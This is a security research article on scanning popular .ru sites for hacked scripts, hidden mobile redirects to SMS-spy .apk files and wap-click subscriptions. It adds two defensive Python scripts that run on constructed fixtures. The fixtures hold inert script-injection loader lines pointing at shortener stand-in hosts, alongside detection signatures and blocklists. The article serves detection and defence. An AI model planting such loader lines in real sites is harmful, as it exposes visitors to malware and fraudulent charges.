If you look at the Alexa Top-1000 sites in the .ru zone, the first three hundred are Yandex, Google, Mail.ru and other major projects and companies, followed mainly by entertainment and gaming resources, torrent trackers and niche media (and occasionally the domains of teaser partner networks).

Sites outside the very top of that first thousand get roughly 10,000 to 80,000 unique hosts per day, sometimes more. For hackers such resources are attractive because, on the one hand, they have high traffic and, on the other, a low level of protection (usually none at all), since the owners of such sites rarely pay enough attention to security (they don't know, don't know how, or don't want to). For example, a resource with 85,000 unique hosts per day can run on WordPress with vulnerable versions of plug-ins. The result is that, for this category of sites, the "profit" from a compromise relative to its cost is as high as it gets, and that is a tidbit some attacker is sure to use. In theory all of this looks logical, but I wanted to see it in practice, so I decided to scan a large array of top resources (the first 50,000 Alexa sites in the .ru zone) for hacking/infection, redirects and other security problems. What came out of it is described below.
To save readers time, I'll give the results right away: about 2% of the sites (971 sites, to be exact) were "sick". The problems covered the full spectrum: redirects to downloads of infected apk and exe files, hidden mobile redirects to wap-click affiliate programs, phishing, and even two defacements. Although the share of problem sites seems small, the danger turned out to be significant, since hidden redirects showed up on popular sites with 60K hosts per day.
For more effective detection of malicious code I used several infection indicators, since malware cannot always be identified by signatures alone or by behavioural analysis alone. The analysis took into account:
- redirects when opening pages with various combinations of User-Agent and Referer,
- malicious script signatures (regular expressions),
- the presence of a domain or URL fragment in databases of dangerous, suspicious or malicious resources,
- the presence of the site in the "black lists" of search engines (Safe Browsing) and antivirus services (via VirusTotal).
To minimise the number of false positives, white lists of domains and URL fragments were used. For example, redirects triggered by clicks on banners and banner plug-ins, redirects to mobile versions of sites, and so on were not counted. When checking each site, a series of requests was sent to the start page, then the scanner navigated to the linked pages and performed certain actions on them, as if the site had real visitors with various parameters (browser, referrer, platform, etc.). The results for all pages were then combined into one overall report, and so on for each of the 50,000 resources checked. Stock PhantomJS was not suitable for the task because of restrictions on some read-only DOM objects that I needed to override, so I had to patch it substantially together with WebKit.
Analysing a large array of sites revealed some common infection patterns and typical ways of introducing malware into scripts and page code (for example, frequent use of link-shortening services such as goo.gl and vk.cc to hide script addresses, code added to the beginning or end of jquery*.js files, a family of unscrupulous teaser/advertising partner networks, etc.).
Let me show the details with a couple of examples. The first is a resource at around position 750 in the Alexa ranking of .ru sites, a fairly popular torrent tracker. It naturally has high traffic: just over 60,000 unique visitors per day (according to the LiveInternet counter).

Let's try opening the site from a mobile device: enter the site's address in the Google search bar, go to a subsection and click the download button in the page text. Instead of a .torrent file downloading, we are redirected through third-party sites and finally offered to download and install an .apk file called download.apk.

To quickly check the file for malware, we upload it to VirusTotal and get the expected result: SMS.Agent (an SMS spy):

If you repeat the experiment a few more times, sometimes you are offered a "download accelerator" which, as you may have guessed, accelerates the interception of your SMS:

To keep the malicious code undiscovered as long as possible, the hacker does his best to disguise it: he injects the code dynamically and uses multi-step checks at runtime. For this reason it is extremely difficult for automated scanners to catch the redirect without knowing all the nuances. In this case the redirect had the following properties:
- the malicious injection was in the scrolltop.js script;
- the code fired for a given visitor once every 4.5 months (a cookie was set);
- the code was injected dynamically only if the visitor came from a search engine;
- the redirect itself fired only when certain links were clicked;
- the .apk download started only if the visitor came from an Android device (checked in the redirect chain on the malicious resource).
Below is the code fragment that the loader injected:

If at least one of the listed conditions is not met, no redirect occurs. Despite the complex trigger conditions, the scanner managed to spot the malware by its characteristic signature and by the script injection from a suspicious domain:

You can roughly estimate the "scale of the disaster" for this site. When a resource with about 50-60K visitors is hacked and infected, an average of about 400-500 visitors a day come from mobile devices. At a rough estimate, hundreds of visitors can end up downloading an infected .apk file.
Consider another "top" example from the infected list. This time it is a fitness portal at roughly position 450 (i.e. even more visited). This "patient" alternately threw visitors to a paid subscription service and to software offering to "speed up" Android.
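The multi-indicator methodology described earlier (visits under several User-Agent/Referer profiles, redirect analysis with a whitelist, script signatures, a local domain blocklist and an external blacklist lookup) and the conditional redirect just described can be sketched in one small scanner. This is an added example written for this page, not the author's scanner: the site is a constructed in-memory fixture rather than a real host, all hosts, paths and feed entries are invented, the injected snippet in the fixture is an inert placeholder, and the profile's entry referer stands in for the cookie and JS state a real browser would carry into a click.

```python
"""Multi-indicator scan of one site under several visitor profiles.
Added example: not the author's scanner. The site is a constructed in-memory
fixture (no network); hosts, paths and feed entries are invented test values."""
import re
from urllib.parse import urljoin, urlparse

SITE = "http://torrent.example.test"              # constructed
BAD = "http://cdn.bad.example.test"               # constructed
PROFILES = [("desktop-direct", "desktop", None),
            ("android-direct", "android", None),
            ("android-from-google", "android", "https://www.google.ru/search?q=x")]
WHITELIST_HOSTS = {"m.torrent.example.test", "banners.partner.example.test"}
SHORTENERS = {"goo.gl", "vk.cc"}
BLOCKLIST_HOSTS = {"cdn.bad.example.test"}        # local "dangerous domains" list
BLACKLIST_FEED = {"cdn.bad.example.test": {"safe-browsing"}}  # stand-in for SB/VT
SIGNATURES = [(re.compile(r"'<scr'\s*\+\s*'ipt"), "split-string script loader"),
              (re.compile(r"https?://(goo\.gl|vk\.cc)/\S+"), "shortened script url")]
DANGEROUS_EXT = (".apk", ".exe")
LINK_RE = re.compile(r'(?:href|src)="([^"]+)"')

def _page(url, ua, from_search):
    """Constructed site: only Android visitors arriving from a search engine are
    redirected from the download link, like the case described above."""
    if url == SITE + "/":
        return 200, {"Content-Type": "text/html"}, (
            '<html><script src="/js/scrolltop.js"></script>'
            '<a href="/download/123">Download .torrent</a><a href="/m/">Mobile</a></html>')
    if url == SITE + "/js/scrolltop.js":   # inert constructed injection at the tail
        return 200, {"Content-Type": "application/javascript"}, (
            "window.onscroll=function(){};\n"
            "document.write('<scr'+'ipt src=\"http://vk.cc/xXxX\"></scr'+'ipt>');")
    if url == SITE + "/m/":
        return 302, {"Location": "http://m.torrent.example.test/"}, ""
    if url == "http://m.torrent.example.test/":
        return 200, {"Content-Type": "text/html"}, "<html>mobile</html>"
    if url == SITE + "/download/123":
        if ua == "android" and from_search:
            return 302, {"Location": "http://vk.cc/yYyY"}, ""
        return 200, {"Content-Type": "application/x-bittorrent"}, "d8:announce"
    if url == "http://vk.cc/yYyY":
        return 302, {"Location": BAD + "/download.apk"}, ""
    if url == BAD + "/download.apk":
        return 200, {"Content-Type": "application/vnd.android.package-archive"}, "PK"
    return 404, {}, ""

def fetch(url, ua, referer):
    """Stand-in for an HTTP client that sends the profile's UA and Referer."""
    from_search = referer is not None and "google." in urlparse(referer).netloc
    return _page(url, ua, from_search)

def host(url):
    return urlparse(url).netloc

def follow(url, ua, referer, max_hops=10):
    """Follow HTTP redirects; return (chain of URLs, final content type, body)."""
    chain = [url]
    for _ in range(max_hops):
        status, headers, body = fetch(chain[-1], ua, referer)
        if status in (301, 302, 303, 307, 308) and "Location" in headers:
            chain.append(urljoin(chain[-1], headers["Location"]))
            continue
        return chain, headers.get("Content-Type", ""), body
    return chain, "", ""

def check_redirect(chain, site_host):
    """Redirect indicators; the whitelist suppresses benign hops (mobile version etc.)."""
    found, final = [], chain[-1]
    if host(final) != site_host and host(final) not in WHITELIST_HOSTS:
        found.append(("external-redirect", " -> ".join(chain)))
    if any(host(u) in SHORTENERS for u in chain[1:]):
        found.append(("shortener-in-chain", " -> ".join(chain)))
    if final.lower().endswith(DANGEROUS_EXT):
        found.append(("dangerous-download", final))
    return found

def scan_site(start_url, blacklist_lookup=lambda h: set()):
    """Visit the start page and its links under every profile; merge all indicators."""
    site_host, findings, hosts_seen = host(start_url), set(), set()
    for label, ua, referer in PROFILES:
        chain, ctype, body = follow(start_url, ua, referer)
        findings.update((k, d, label) for k, d in check_redirect(chain, site_host))
        hosts_seen.update(host(u) for u in chain)
        for link in LINK_RE.findall(body):
            # the profile's entry referer stands in for the session state a real
            # browser would carry into the click (simplification of this example)
            sub, sub_ctype, sub_body = follow(urljoin(chain[-1], link), ua, referer)
            findings.update((k, d, label) for k, d in check_redirect(sub, site_host))
            hosts_seen.update(host(u) for u in sub)
            if "javascript" in sub_ctype:
                findings.update(("signature:" + name, sub[0], "*")
                                for rx, name in SIGNATURES if rx.search(sub_body))
    for h in hosts_seen:
        if h in BLOCKLIST_HOSTS:
            findings.add(("blocklisted-host", h, "*"))
        for feed in blacklist_lookup(h):
            findings.add(("blacklisted:" + feed, h, "*"))
    return sorted(findings)

def feed_lookup(h):
    return BLACKLIST_FEED.get(h, set())

if __name__ == "__main__":
    for kind, detail, profile in scan_site(SITE + "/", feed_lookup):
        print(f"[{profile}] {kind}: {detail}")
```

Running it shows why a single profile is not enough: the desktop and direct Android visits see a normal .torrent download and only the whitelisted hop to the mobile subdomain, while the Android-from-search profile produces the external redirect through a shortener to an .apk; the script signature, the blocklisted host and the blacklist feed hit are reported once for the site regardless of profile, which is the combined report the text describes.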

At the next redirect, out of curiosity, I clicked the "Continue browsing" button, and then magic happened: I was automatically subscribed to paid content, of which I was immediately notified by SMS. No questions, no confirmation that I wanted this, no additional gestures were required.

I checked the list of connected services in my MTS personal account: a paid subscription for 20 rubles had indeed appeared. Unsubscribed.
Interestingly, by the time the page with the "continue browsing" button is generated, the script already knows your phone number, because the SMS subscription is done with the "blessing" of the mobile operator itself, which provides the necessary interface and subscriber information.

So the subscription process cannot be automated. And if you do not keep an eye on SMS notifications, you can be charged a few dozen rubles a day simply by visiting various portals (and that is without counting clickjacking, where you unknowingly click in the right place and approve the subscription or the download of the malware).
The injection mechanics on this site are simpler: the hacker added the following fragment to one of the JavaScript files:

This code loaded a script from the yadro24.ru domain, which in turn redirected users to the wap-click portal, provided that the visitor was connected via mobile 3G/LTE Internet (the JavaScript code shows which redirects are possible).

If the mobile visitor came via Wi-Fi, no redirect to the wap-click affiliate program occurred. This, by the way, is a big problem for detecting wap-click redirects with online services, since all requests have to be sent over 3G/LTE through specific mobile operators.
Similar infection variants were found on other sites from the Alexa Top. Sometimes the code is embedded at the beginning of scripts, sometimes at the end.

The examples considered are clear cases of targeted hacking of sites and code injection by hackers. But among the tested sites there was often another option: voluntary placement of a widget with hidden redirects, or of a teaser partner network that redirects mobile users to dangerous sites or a wap-click affiliate program. Site owners are either unaware of what is happening or, in pursuit of higher earnings, turn a blind eye to it.
Summary statistics for the various categories of infection were as follows:

A curious fact: most of the resources on the "problem" list (those that serve malicious files or redirect visitors to dangerous sites and wap-click affiliate programs) are not flagged in Yandex/Google Safe Browsing as "malware" or even "unwanted". Either the search engines have not had time to check them, or they do not detect them, although the latter is unlikely. True, some sites are still removed from mobile search results.
Well, finally, I would like to advise two things:
- If you are a visitor to these popular resources, do not assume that all of them are safe. Even if you have an antivirus installed, it will not save you from problems such as wap-click redirects to SMS subscriptions, because that is not a virus (you are simply subscribed to a paid service without noticing and charged 20 rubles every day). And, frankly, antiviruses protect against drive-by attacks far from 100% of the time, especially on Android. So it is good practice to check such sites independently with specialised services whenever suspicion arises.
- If you own such resources and have not yet thought about site security, or it seems to you that you have not been hacked, it is time for full site diagnostics: scan the files on the hosting for web shells and backdoors (the AI-BOLIT utility, ClamAV and Maldet exist for this), perhaps even commission a pentest of the project, and check for security problems with online services (for example rescan.pro, quttera.com, sitecheck.sucuri.net). Also, do not be lazy: open your site from the search results on a mobile device over a 3G/LTE connection, click through the site's links selectively, look at the code, and check for any anomalies.
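One concrete way for a site owner to do the file check recommended above, and to spot the pattern noted earlier of code being added at the beginning or end of jquery*.js and other scripts, is to compare the web root against pristine copies of the CMS and library files. The script below is an added example written for this page; it is not one of the tools named above (AI-BOLIT, ClamAV, Maldet) and not the author's code. The WordPress-like directory layout, the file contents (the "jQuery" file is a stub, not the real library) and the injected snippets are all constructed, inert placeholders.

```python
"""File-integrity audit of a web root against pristine CMS/library files.
Added example, not one of the tools named above. Paths and file contents are
constructed; the injected snippets are inert placeholders."""
import hashlib
import re
import tempfile
from pathlib import Path

SHORTENER_RE = re.compile(rb"https?://(goo\.gl|vk\.cc)/")
SCRIPT_EXT = (".php", ".phtml", ".js")
# constructed file contents (not real jQuery); the injection is a harmless stand-in
JQUERY = b"/*! jQuery v1.11.3 | (c) jQuery Foundation */\n!function(a){a.jQuery={}}(window);\n"
SCROLLTOP = b"window.onscroll=function(){/* scroll-to-top widget */};\n"
INJECT = b"var s=document.createElement('script');s.src='http://goo.gl/zZzZ';document.head.appendChild(s);\n"

def sha256(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()

def locate_change(orig: bytes, cur: bytes):
    """Classify how a modified file differs from its pristine copy: code prepended,
    appended, or changed somewhere inside. Returns (kind, changed_region)."""
    limit = min(len(orig), len(cur))
    pre = 0
    while pre < limit and orig[pre] == cur[pre]:
        pre += 1
    suf = 0
    while suf < limit - pre and orig[-1 - suf] == cur[-1 - suf]:
        suf += 1
    region = cur[pre:len(cur) - suf]
    if pre == 0 and suf == len(orig):
        return "prepended", region
    if pre == len(orig):
        return "appended", region
    return "inside", region

def audit(webroot: Path, pristine: Path):
    """Compare every file under webroot with the pristine tree; report modified
    files (with where the change sits) and scripts that have no pristine counterpart."""
    findings = []
    for path in sorted(p for p in webroot.rglob("*") if p.is_file()):
        rel = path.relative_to(webroot)
        ref = pristine / rel
        if ref.is_file():
            if sha256(ref) != sha256(path):
                kind, region = locate_change(ref.read_bytes(), path.read_bytes())
                note = "shortener-url" if SHORTENER_RE.search(region) else ""
                findings.append((str(rel), "modified:" + kind, note))
        elif path.suffix.lower() in SCRIPT_EXT:
            findings.append((str(rel), "unexpected-script", ""))
    return findings

def demo():
    """Build a constructed WordPress-like tree with two injected JS files and a
    stray PHP file in the uploads directory, then audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        pristine, web = Path(tmp, "pristine"), Path(tmp, "webroot")
        for base in (pristine, web):
            (base / "wp-includes/js").mkdir(parents=True)
            (base / "wp-content/uploads/2017").mkdir(parents=True)
            (base / "wp-includes/js/jquery.js").write_bytes(JQUERY)
            (base / "wp-includes/js/scrolltop.js").write_bytes(SCROLLTOP)
            (base / "wp-content/uploads/2017/photo.jpg").write_bytes(b"\xff\xd8\xff")
        (web / "wp-includes/js/jquery.js").write_bytes(INJECT + JQUERY)       # code at the start
        (web / "wp-includes/js/scrolltop.js").write_bytes(SCROLLTOP + INJECT)  # code at the end
        (web / "wp-content/uploads/2017/cache.php").write_bytes(b"<?php /* constructed */ ?>")
        return audit(web, pristine)

if __name__ == "__main__":
    for rel, kind, note in demo():
        print(f"{kind:20} {rel} {note}")
```

The pristine tree would in practice be the unpacked CMS release and vendor library packages of the exact versions deployed; reporting where the change sits (start, end or inside) and whether the changed region points at a link shortener is what lets you triage a modified minified file without reading all of it.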
It should be noted that some resources had already dealt with the infection by the time this article was written and currently pose no threat, but a sufficiently large share of the sites examined still had not changed the situation even after 10 days:
